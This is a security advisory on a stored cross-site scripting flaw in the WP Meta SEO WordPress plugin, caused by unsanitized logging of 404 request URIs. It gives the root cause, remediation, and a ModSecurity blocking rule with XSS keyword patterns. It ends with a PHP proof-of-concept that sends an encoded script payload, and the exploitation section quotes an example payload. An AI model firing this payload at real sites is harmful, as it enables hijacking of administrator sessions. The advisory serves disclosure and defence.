Atomic Edge analysis of CVE-2026-9643 (metadata-based): This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the WP Meta SEO plugin for WordPress, up to version 4.5.18. The attack targets the 404 logging feature. An attacker sends a specially crafted request to a non-existent page. The plugin logs the raw REQUEST_URI without sanitization. An administrator who views the 404 & Redirects log page triggers the stored script. The CVSS score is 7.2 (High) with a scope change, reflecting the potential for cookie theft or admin actions under the victim’s session.
Root Cause: The CWE-79 classification and the vulnerability description confirm the root cause. The plugin’s `wpmsTemplateRedirect()` function detects a 404 error. It then concatenates `$_SERVER[‘HTTP_HOST’]` with the raw `$_SERVER[‘REQUEST_URI’]` value. This combined string is inserted directly into the `wp_wpms_links.link_url` database column using `$wpdb->insert()`. Atomic Edge analysis infers that no escaping or sanitization is applied to the URL string before database insertion. Furthermore, when the plugin renders the log page, it outputs the stored value without proper escaping. This insecure concatenation and storage of attacker-controlled input leads to stored XSS.
Exploitation: An unauthenticated attacker can exploit this by making an HTTP request to any non-existent path on the WordPress site. The path must end with a payload that breaks out of the URL context and injects JavaScript. For example, a request to `http://target.com/anypath”>alert(document.cookie)` triggers the vulnerability. The server’s REQUEST_URI, which includes the malicious payload, is logged. When an administrator accesses the plugin’s admin page at `/wp-admin/admin.php?page=metaseo_broken_link`, the unsanitized payload executes in their browser. No authentication or nonce is required for the initial injection.
Remediation: The fix must occur in two places. First, the plugin must sanitize or validate the `$_SERVER[‘REQUEST_URI’]` value before storing it in the database. Using `sanitize_url()` or rejecting URIs containing HTML/script characters would prevent the injection. Second, the plugin must escape the stored URL value when rendering the admin log page. Using `esc_url()` or `esc_html()` would neutralize any remaining script code. Atomic Edge analysis recommends both server-side input validation and context-aware output escaping as a depth-of-defense approach.
Impact: Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of an authenticated administrator’s session. The attacker can steal session cookies, perform administrative actions via XSS (like installing malicious plugins, modifying site options, or creating backdoor admin accounts), and deface the site. The scope change in the CVSS vector indicates that the injected script can affect resources beyond the vulnerable component. This can lead to full site compromise.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-9643 (metadata-based)
# Blocks stored XSS via REQUEST_URI in WP Meta SEO 404 logging
# Targets requests with suspicious HTML/script content in the URI path
SecRule REQUEST_URI "@rx <[a-zA-Z/][^>]*>"
"id:20269643,phase:2,deny,status:403,chain,msg:'CVE-2026-9643 WP Meta SEO Unauthenticated Stored XSS via REQUEST_URI',severity:'CRITICAL',tag:'CVE-2026-9643'"
SecRule REQUEST_URI "@rx .*[()<>].*" "chain"
SecRule REQUEST_URI "@rx alert|script|onload|onerror|onmouseover|javascript:" "t:lowercase"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9643 - WP Meta SEO <= 4.5.18 - Unauthenticated Stored Cross-Site Scripting via REQUEST_URI
$target_url = 'http://example.com'; // Change to the target WordPress site URL
// Craft a malicious path for the 404 request
// The payload is a simple XSS that will execute in the admin's browser when they view the logs
$payload = '/anypath%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E'; // URL-encoded version
$full_request_url = $target_url . $payload;
// Initialize cURL session
$ch = curl_init();
// Set cURL options - this mimics an unauthenticated request to trigger the 404 logging
curl_setopt($ch, CURLOPT_URL, $full_request_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing with self-signed certs
// Execute the request
$response = curl_exec($ch);
// Check for errors
if(curl_errno($ch)) {
echo 'Error: ' . curl_error($ch) . "n";
} else {
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "Request sent successfully. HTTP code: " . $http_code . "n";
echo "If the target runs WP Meta SEO 4.5.18 or below, the payload has been logged.n";
echo "An administrator visiting /wp-admin/admin.php?page=metaseo_broken_link will execute the script.n";
}
// Close cURL session
curl_close($ch);
?>
